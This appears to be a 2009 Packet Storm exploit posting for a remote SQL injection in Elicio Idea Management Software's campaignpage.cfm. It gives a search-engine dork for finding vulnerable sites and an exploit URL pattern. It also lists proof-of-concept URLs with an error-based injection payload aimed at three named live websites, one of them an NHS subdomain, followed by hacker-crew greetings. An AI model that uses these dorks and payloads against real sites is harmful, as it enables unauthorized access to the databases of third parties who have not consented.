Elicio Idea Management Software SQL Injection

2009-08-11T00:00:00
ID PACKETSTORM:80274
Type packetstorm
Reporter S3T4N
Modified 2009-08-11T00:00:00

Description

                                        
                                            `#*******************************************************************************************#  
#Title : Elicio Idea Management Software [Remote SQL injection]  
#*******************************************************************************************#  
#Software : Elicio Idea Management Software  
#vendor : http://www.wiredforideas.com  
#Date : 08/12/2009 [Indonesia]  
#Author : S3T4N  
#Contact : root[at]sux0r.net  
#Blog : http://sux0r.net  
#*******************************************************************************************#  
#[o]Vulnerable file  
#campaignpage.cfm  
#*******************************************************************************************#  
#[o] Dork  
#inurl:/campaignpage.cfm?c_campaignid=  
#*******************************************************************************************#  
#[o] Exploit  
#http://target/campaignpage.cfm?c_campaignid=[SQL]  
#*******************************************************************************************#  
#[o] POC  
#http://www.dragoncottage.co.uk/campaignpage.cfm?c_campaignid=1%20and%201=convert(int,(@@version))--  
#http://nhs-ideas.wiredforideas.com/nhselicio/campaignpage.cfm?c_campaignid=3%20and%201=convert(int,(@@version))--  
#http://www.wiredforideas.com/campaignpage.cfm?c_campaignid=3%20and%201=convert(int,(@@version))--  
#*******************************************************************************************#  
#[o] Greetz  
#www.MainHack.net - www.ServerIsDown.org - www.sux0r.net  
#VOP Crew [ Vaksin13 * OoN_Boy * Paman ]  
#R3VAN_BASTARD * Kecemplungkalen * eminem * [S]hiro  
#zxvf * Pizzyroot * iwannine  
#Jupe Crew [makasih buat ngenet gratisnya wkwkwk]  
#special to Bu Rosa, maap udah selalu merepotkan tiap semester :D  
#*******************************************************************************************#`